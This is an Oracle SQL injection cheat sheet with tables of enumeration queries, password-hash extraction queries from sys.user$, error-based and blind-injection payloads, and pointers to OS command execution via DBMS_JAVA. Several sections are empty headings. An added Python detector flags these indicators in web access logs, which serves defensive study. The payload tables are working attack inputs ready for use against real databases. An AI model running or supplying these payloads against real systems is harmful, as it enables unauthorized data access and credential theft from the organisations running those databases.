# Oracle SQL Injection

Oracle SQL Injection is a security vulnerability that arises when an attacker can insert, or "inject", SQL code into queries executed by Oracle Database. It occurs when user input is not properly sanitized or parameterized, letting the attacker alter the logic of the query, which can lead to unauthorized access, data manipulation, and other severe consequences.
## Summary

* Oracle SQL Default Databases
* Oracle SQL Comments
* Oracle SQL Enumeration
* Oracle SQL Database Credentials
* Oracle SQL Methodology
  * Oracle SQL Error Based
  * Oracle SQL Blind
  * Oracle SQL Time Based
  * Oracle SQL Out of Band
* Oracle SQL Command Execution
  * Oracle Java Execution
  * Oracle Java Class
  * DBMS_SCHEDULER Jobs
* OracleSQL File Manipulation
  * OracleSQL Read File
  * OracleSQL Write File
* References
## Oracle SQL Default Databases

| Name   | Description               |
| ------ | ------------------------- |
| SYSTEM | Available in all versions |
| SYSAUX | Available in all versions |
## Oracle SQL Comments

| Type                | Comment |
| ------------------- | ------- |
| Single-Line Comment | `--`    |
| Multi-Line Comment  | `/**/`  |
## Oracle SQL Enumeration

| Description   | Query                                                            |
| ------------- | ---------------------------------------------------------------- |
| DBMS version  | `SELECT user FROM dual UNION SELECT * FROM v$version`            |
| DBMS version  | `SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';`      |
| DBMS version  | `SELECT banner FROM v$version WHERE banner LIKE 'TNS%';`         |
| DBMS version  | `SELECT BANNER FROM gv$version WHERE ROWNUM = 1;`                |
| DBMS version  | `SELECT version FROM v$instance;`                                |
| Hostname      | `SELECT UTL_INADDR.get_host_name FROM dual;`                     |
| Hostname      | `SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;`         |
| Hostname      | `SELECT UTL_INADDR.get_host_address FROM dual;`                  |
| Hostname      | `SELECT host_name FROM v$instance;`                              |
| Database name | `SELECT global_name FROM global_name;`                           |
| Database name | `SELECT name FROM V$DATABASE;`                                   |
| Database name | `SELECT instance_name FROM V$INSTANCE;`                          |
| Database name | `SELECT SYS.DATABASE_NAME FROM DUAL;`                            |
| Database name | `SELECT sys_context('USERENV', 'CURRENT_SCHEMA') FROM dual;`     |
## Oracle SQL Database Credentials

| Query                                    | Description               |
| ---------------------------------------- | ------------------------- |
| `SELECT username FROM all_users;`        | Available on all versions |
| `SELECT name, password from sys.user$;`  | Privileged, <= 10g        |
| `SELECT name, spare4 from sys.user$;`    | Privileged, <= 11g        |
## Oracle SQL Methodology

### Oracle SQL List Databases

### Oracle SQL List Tables

### Oracle SQL List Columns
### Oracle SQL Error Based

| Description          | Query |
| -------------------- | ----- |
| Invalid HTTP Request | `SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual` |
| CTXSYS.DRITHSX.SN    | `SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual` |
| Invalid XPath        | `SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual` |
| Invalid XML          | `SELECT to_char(dbms_xmlgen.getxml('select "'\|\|(select user from sys.dual)\|\|'" FROM sys.dual')) FROM dual` |
| Invalid XML          | `SELECT rtrim(extract(xmlagg(xmlelement("s", username \|\| ',')),'/s').getstringval(),',') FROM all_users` |
| SQL Error            | `SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))` |
| XDBURITYPE getblob   | `XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()` |
| XDBURITYPE getclob   | `XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()` |
| XMLType              | `AND 1337=(SELECT UPPER(XMLType(CHR(60)\|\|CHR(58)\|\|'~'\|\|(REPLACE(REPLACE(REPLACE(REPLACE((SELECT banner FROM v$version),' ','_'),'$','(DOLLAR)'),'@','(AT)'),'#','(HASH)'))\|\|'~'\|\|CHR(62))) FROM DUAL) -- -` |
| DBMS_UTILITY         | `AND 1337=DBMS_UTILITY.SQLID_TO_SQLHASH('~'\|\|(SELECT banner FROM v$version)\|\|'~') -- -` |

When the injection point is inside a string, use: `'||PAYLOAD--`
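As an added defensive example (not part of the original page), a small Python detector that flags the Oracle-specific views, packages and functions named in the tables above when they show up in URL-encoded request parameters, after normalising the `--` and `/**/` comment forms and the `'||` string-context concatenation from the note above. The log lines are constructed samples in Apache combined format, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Oracle-specific views, packages and functions taken from the payload tables
# on this page; normal application traffic never names them in a parameter.
ORACLE_INDICATORS = [
    r"gv\$version", r"v\$version", r"v\$instance", r"v\$database", r"sys\.user\$",
    r"all_users", r"user_tab_cols", r"from\s+dual", r"utl_inaddr", r"global_name",
    r"ctxsys\.drithsx\.sn", r"ord_dicom\.getmappingxpath", r"dbms_xmlgen",
    r"xmlagg", r"xdburitype", r"xmltype", r"dbms_utility\.sqlid_to_sqlhash",
    r"dbms_java", r"dbms_scheduler", r"sys_context\s*\(",
]
INDICATOR_RE = re.compile("|".join(ORACLE_INDICATORS), re.IGNORECASE)
CONCAT_RE = re.compile(r"'\s*\|\|")  # string-context concatenation: '||PAYLOAD

def normalize(value: str) -> str:
    """URL-decode twice (catches double encoding) and strip Oracle comments."""
    text = unquote_plus(unquote_plus(value))
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.DOTALL)   # /**/ -> space
    return re.sub(r"--.*$", "", text, flags=re.MULTILINE)      # drop -- tails

def oracle_sqli_indicators(query_string: str) -> list[str]:
    """Return the distinct indicators (lower-cased) found in a query string."""
    found = []
    for param in query_string.split("&"):
        text = normalize(param.partition("=")[2])
        found += [m.group(0).lower() for m in INDICATOR_RE.finditer(text)]
        if CONCAT_RE.search(text):
            found.append("'||")
    return list(dict.fromkeys(found))  # de-duplicate, keep first-seen order

def scan_access_log(lines):
    """Yield (client_ip, path, indicators) for requests tripping the detector."""
    for line in lines:
        m = re.match(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)', line)
        hits = oracle_sqli_indicators(m.group(2).partition("?")[2]) if m else []
        if hits:
            yield m.group(1), m.group(2), hits

# Constructed sample lines (Apache combined format), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item?id=42 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=42%27%7C%7CUTL_INADDR.'
    'get_host_name((select%20banner%20from%20v%24version%20where%20rownum%3D1))-- '
    'HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=1/**/UNION/**/SELECT'
    '/**/name,password/**/from/**/sys.user%24 HTTP/1.1" 200 700',
]
```

`scan_access_log(SAMPLE_LOG)` flags only the two requests from 10.0.0.9, reporting `utl_inaddr`, `v$version` and `'||` for the first and `sys.user$` for the comment-obfuscated one.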
### Oracle SQL Blind

| Description                                 | Query |
| ------------------------------------------- | ----- |
| Version is 12.2                             | `SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';` |
| Subselect is enabled                        | `SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)` |
| Table log_table exists                      | `SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table);` |
| Column message exists in table log_table    | `SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE';` |
| First letter of first message is t          | `SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';` |
#### Oracle Blind With Substring Equivalent

| Function | Description                           |
| -------- | ------------------------------------- |
| SUBSTR   | `SUBSTR('foobar', <START>, <LENGTH>)` |
### Oracle SQL Time Based

### Oracle SQL Out of Band

## Oracle SQL Command Execution

* quentinhardy/odat - ODAT (Oracle Database Attacking Tool)
### Oracle Java Execution

* List Java privileges
* Grant privileges
* Execute commands
  * 10g R2, 11g R1 and R2: `DBMS_JAVA_TEST.FUNCALL()`
  * 11g R1 and R2: `DBMS_JAVA.RUNJAVA()`

### Oracle Java Class

* Create Java class
* Run OS command
* Package os_command

### DBMS_SCHEDULER Jobs
## OracleSQL File Manipulation

> ⚠️ Only in a stacked query.

### OracleSQL Read File

### OracleSQL Write File

## References